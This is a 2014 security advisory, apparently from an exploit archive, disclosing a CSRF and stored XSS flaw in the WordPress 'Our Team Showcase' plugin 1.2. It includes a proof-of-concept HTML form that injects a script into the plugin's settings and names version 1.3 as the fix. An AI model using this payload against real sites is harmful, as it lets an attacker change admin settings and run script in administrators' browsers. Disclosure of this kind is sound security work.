WordPress Our Team Showcase plugin version 1.2 suffers from a cross site request forgery vulnerability that can be leveraged to trick an admin into storing cross site scripting code.
0c41ba52bd210bae0a33207a0339ec414e398cdade597244db61ef50f1d4cd57
Title: WordPress 'Our Team Showcase' plugin - CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/our-team-enhanced/
Notified WordPress: 2014/11/27
----------------------------------------------------------------
## Description:
----------------------------------------------------------------
This plugin allows you to add, edit, search and display your team members on any page, or in a widget quickly and easily.
It comes with a couple of different styles to choose from.
Re-order team members with a simple drag & drop.
output your team members anywhere with the shortcode [our-team]
Boosts SEO with schema.org markup
## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
----------------------------------------------------------------
Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin and then submit the following form.
<form method="POST" action="http://[DOMAIN]wp-admin/edit.php?post_type=team_member&page=sc_team_settings" enctype="multipart/form-data">
<input type="text" name="sc_our_team_template" value="grid"><br />
<input type="text" name="sc_our_team_social" value="yes"><br />
<text>sc_our_team_member_count: </text>
<input type="text" name="sc_our_team_member_count" value="-1"><script>alert(document.cookie);</script>"><br />
<input type="text" name="sc_our_team_save" value="Update"><br />
<input type="submit">
</form>
## Solution
----------------------------------------------------------------
Update to version 1.3.